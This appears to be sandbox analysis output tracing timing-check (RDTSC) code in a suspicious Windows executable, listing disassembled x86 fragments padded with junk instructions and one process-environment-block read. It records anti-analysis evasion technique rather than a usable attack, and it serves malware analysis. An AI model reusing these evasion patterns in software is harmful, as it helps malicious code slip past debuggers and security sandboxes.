Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0F212 second address: F0F22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F262D38FB08h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F262D38FB06h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0F22C second address: F0F234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F0F3CB second address: F0F3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F262D38FB06h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC422F second address: EC423D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F262CBE4E86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC423D second address: EC4245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC4245 second address: EC4250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F262CBE4E86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9A1A6 second address: E9A1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F262D38FB11h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9A1C4 second address: E9A1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9A1D4 second address: E9A1D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13233 second address: F13249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F262CBE4E8Fh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1ABF second address: EE1AD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F262D38FB06h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F262D38FB06h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1AD6 second address: EE1AE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1AE0 second address: EE1B7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F262D38FB14h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F262D38FB08h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+12A02061h], esi 0x0000002c lea eax, dword ptr [ebp+12BB5833h] 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F262D38FB08h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c movsx ecx, dx 0x0000004f push ecx 0x00000050 xor dword ptr [ebp+12A0194Eh], eax 0x00000056 pop edx 0x00000057 nop 0x00000058 jbe 00007F262D38FB1Fh 0x0000005e jmp 00007F262D38FB19h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1B7B second address: EE1B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E8Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1B8F second address: EC36DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F262D38FB18h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F262D38FB08h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 pushad 0x00000029 movzx eax, cx 0x0000002c mov ecx, dword ptr [ebp+12A029BEh] 0x00000032 popad 0x00000033 call dword ptr [ebp+12A0290Eh] 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE20B3 second address: EE20B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE22AF second address: EE22B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE22B3 second address: EE22DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F262CBE4E92h 0x0000000e jnl 00007F262CBE4E8Ch 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F262CBE4E88h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE22DB second address: EE230A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F262D38FB06h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push edi 0x00000011 push ebx 0x00000012 jbe 00007F262D38FB06h 0x00000018 pop ebx 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F262D38FB0Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE230A second address: EE2318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2318 second address: EE2326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262D38FB0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE255F second address: EE2597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F262CBE4E98h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE293B second address: EE294A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F262D38FB06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE294A second address: EE29A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F262CBE4E95h 0x00000010 nop 0x00000011 mov edx, dword ptr [ebp+12B8CF11h] 0x00000017 push 0000001Eh 0x00000019 or dl, 0000002Fh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F262CBE4E98h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2C62 second address: EE2C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2C7A second address: EE2C9A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F262CBE4E95h 0x00000011 jmp 00007F262CBE4E8Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2C9A second address: EE2CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2CA0 second address: EE2CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2CA4 second address: EE2CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F262D38FB08h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2CBA second address: EE2CEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F262CBE4E93h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1350C second address: F13526 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F262D38FB0Eh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F262D38FB06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137AD second address: F137B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F262CBE4E86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137B9 second address: F137CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F262D38FB12h 0x0000000d jp 00007F262D38FB06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137CE second address: F137D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137D6 second address: F137DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137DA second address: F137FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F262CBE4E8Bh 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F262CBE4E8Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13A88 second address: F13A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F262D38FB06h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13BCA second address: F13BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13D4A second address: F13D70 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F262D38FB17h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13D70 second address: F13D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F262CBE4E8Eh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F262CBE4E91h 0x00000014 jnl 00007F262CBE4E86h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13D9E second address: F13DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1946A second address: F1946E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1946E second address: F1947E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F262D38FB0Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1C770 second address: F1C777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F22965 second address: F2298A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262D38FB17h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b js 00007F262D38FB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2167E second address: F216AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F262CBE4E86h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F262CBE4E99h 0x00000012 jc 00007F262CBE4E86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F216AA second address: F216BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F216BC second address: F216C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F216C2 second address: F216C7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F21BF7 second address: F21C05 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F262CBE4E88h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F220C9 second address: F220D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F25486 second address: F254DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F262CBE4EB2h 0x0000000b jmp 00007F262CBE4E95h 0x00000010 jmp 00007F262CBE4E97h 0x00000015 jmp 00007F262CBE4E94h 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F254DA second address: F254F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F262D38FB16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F254F9 second address: F254FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F254FD second address: F25510 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F262D38FB06h 0x00000008 jg 00007F262D38FB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F25686 second address: F2568A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2568A second address: F256BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB17h 0x00000007 jmp 00007F262D38FB19h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A725B second address: 10A725F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A725F second address: 10A7282 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F262D38FB11h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A7282 second address: 10A7299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jno 00007F262CBE4E86h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A7299 second address: 10A72A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F262D38FB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A72A3 second address: 10A72BB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A72BB second address: 10A72C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A87C0 second address: 10A87C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A87C6 second address: 10A87CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B00EC second address: 73B0101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0101 second address: 73B014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F262D38FB0Eh 0x0000000f mov ebx, dword ptr [eax+10h] 0x00000012 pushad 0x00000013 call 00007F262D38FB0Eh 0x00000018 mov eax, 74611791h 0x0000001d pop eax 0x0000001e pushad 0x0000001f mov di, DBD0h 0x00000023 popad 0x00000024 popad 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B014B second address: 73B014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B014F second address: 73B016C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B016C second address: 73B0172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0172 second address: 73B0184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0184 second address: 73B0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0189 second address: 73B0252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, EDh 0x00000005 call 00007F262D38FB12h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [756006ECh] 0x00000014 jmp 00007F262D38FB11h 0x00000019 test esi, esi 0x0000001b jmp 00007F262D38FB0Eh 0x00000020 jne 00007F262D3908EEh 0x00000026 jmp 00007F262D38FB10h 0x0000002b xchg eax, edi 0x0000002c pushad 0x0000002d mov edi, eax 0x0000002f jmp 00007F262D38FB0Ah 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007F262D38FB0Bh 0x0000003b xchg eax, edi 0x0000003c jmp 00007F262D38FB16h 0x00000041 call dword ptr [755D0B60h] 0x00000047 mov eax, 7696E5E0h 0x0000004c ret 0x0000004d pushad 0x0000004e push eax 0x0000004f mov eax, edi 0x00000051 pop edx 0x00000052 movzx esi, bx 0x00000055 popad 0x00000056 push 00000044h 0x00000058 jmp 00007F262D38FB11h 0x0000005d pop edi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F262D38FB18h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0252 second address: 73B0261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0261 second address: 73B0267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0267 second address: 73B026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B026B second address: 73B026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B026F second address: 73B028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F262CBE4E93h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B028D second address: 73B031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c jmp 00007F262D38FB0Eh 0x00000011 push dword ptr [eax] 0x00000013 jmp 00007F262D38FB10h 0x00000018 mov eax, dword ptr fs:[00000030h] 0x0000001e pushad 0x0000001f mov eax, 04FAAD6Dh 0x00000024 movzx ecx, di 0x00000027 popad 0x00000028 push dword ptr [eax+18h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F262D38FB0Eh 0x00000034 sub eax, 174F2A38h 0x0000003a jmp 00007F262D38FB0Bh 0x0000003f popfd 0x00000040 jmp 00007F262D38FB18h 0x00000045 popad 0x00000046 rdtsc
